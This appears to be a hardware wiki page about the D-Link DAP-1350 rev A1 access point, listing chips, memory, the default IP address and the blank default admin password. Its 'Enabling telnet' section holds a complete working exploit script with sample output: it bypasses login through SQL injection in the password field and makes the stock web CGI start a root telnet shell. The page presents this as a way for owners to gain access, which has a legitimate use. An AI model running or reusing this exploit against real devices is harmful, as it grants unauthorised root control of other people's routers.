D-Link DAP-1350 rev A1
D-Link DAP-1350 A1
Availability: now
Manuf (OEM/ODM): Cameo
FCC approval date: 15 September 2009
Country of manuf.: China
Type: wireless router, access point
FCC ID: KA2AP1350A1
IC ID: 4216A-AP1350
Power: 5 VDC, 2.5 A
Connector type: barrel
CPU1: Ralink RT3052 (384 MHz)
FLA1: 8 MiB8,388,608 B <br />65,536 Kib <br />8,192 KiB <br />64 Mib <br />0.00781 GiB <br /> (Macronix MX29LV640EBTI-70G)
RAM1: 32 MiB33,554,432 B <br />262,144 Kib <br />32,768 KiB <br />256 Mib <br />0.0313 GiB <br /> (ESMT M12L128168A-7T × 2)
Expansion IFs: USB 2.0
USB ports: 1
WI1 chip1: Ralink RT3052
WI1 802dot11 protocols: bgn
WI1 MIMO config: 2x2:2
WI1 antenna connector: none
ETH chip1: Ralink RT3052
LAN speed: 100M
LAN ports: 1
bgn
Stock FW OS: Linux
Default SSID: dlink (38 addl. devices)
Default IP address: 192.168.0.50
the IP 192.168.0.50 is used by 63 additional devices
of which 63 are D-Link devices
Default login user: admin
Default login password: blank
admin:blank credentials used by 340 additional devices
of which 180 are D-Link devices
| CPU1 brand | WI1 chip1 brand | WI1 chip2 brand | |
|---|---|---|---|
| D-Link DAP-1350 rev A1 | Ralink | Ralink | |
| D-Link DAP-1350 rev B1 | Ralink | Ralink |
For a list of all currently documented Ralink chipsets with specifications, see Ralink.
Wireless N Pocket Router & Access Point
Forum threads
- OpenWRT trunk contains support for the DAP-1350, however, the 12.09-beta is broken.
- You can build your own firmware now or wait for the Attitude Adjustment release.
Enabling telnet
A vulnerability was discovered in the stock firmware which allows arbitrary commands to be executed as root using HTTP POST requests to a CGI program.
A secondary SQL injection vulnerability also exists allowing one to bypass HTTP authentication.
| • telnet |
|---|
#!/bin/ksh
# DAP-1350 telnetd, by brynet.
# This effect all stock firmware images for the device.
# Tested on OpenBSD.
host=$1
if [ $# -ne 1 ]; then
echo "usage: $0 host or ip"
exit 1;
fi
base_req="POST /my_cgi.cgi?0.2592357019893825 HTTP/1.1\r\n"\
"Host: ${host}\r\nConnection: keep-alive\r\n"\
"Content-Type: application/x-www-form-urlencoded\r\n"
# user_name=admin
# user_pwd=';select 1;--
login_cmd="request=login&user_name=YWRtaW4&user_pwd=JztzZWxlY3QgMTstLQ"
login_clen="Content-Length: $(echo -n ${login_cmd} | wc -c)\r\n\r\n"
login_req="${base_req}${login_clen}${login_cmd}"
echo $login_req | nc $host 80 | grep default > /dev/null 2>&1
if [ $? -eq 0 ]; then
echo "Authenticated."
else
echo "Failed."
exit 1;
fi
telnetd_cmd="request=admin_webtelnet&cmd=/usr/sbin/telnetd%20-l/bin/sh"
telnetd_clen="Content-Length: $(echo -n ${telnetd_cmd} | wc -c)\r\n\r\n"
telnetd_req="${base_req}${telnetd_clen}${telnetd_cmd}"
echo $telnetd_req | nc $host 80 > /dev/null 2>&1
sleep 2; nc -z $host 23 > /dev/null 2>&1
if [ $? -eq 0 ]; then
echo "Root shell, okey doke."
telnet $host
else
echo "No root.. sorry, heh."
exit 1;
fi
Note: nc(1) may be installed as netcat(1) on some systems. Modify as necessary.
$ ./exploit.sh dlinkap # 192.168.0.50
Authenticated.
Root shell, okey doke.
Trying 192.168.0.50...
Connected to dlinkap.
Escape character is '^]'.
... motd/etc.
#
The factory set root password is unknown, so no login(1) process is started.
You must run the exploit script each time the device is powered on.
|
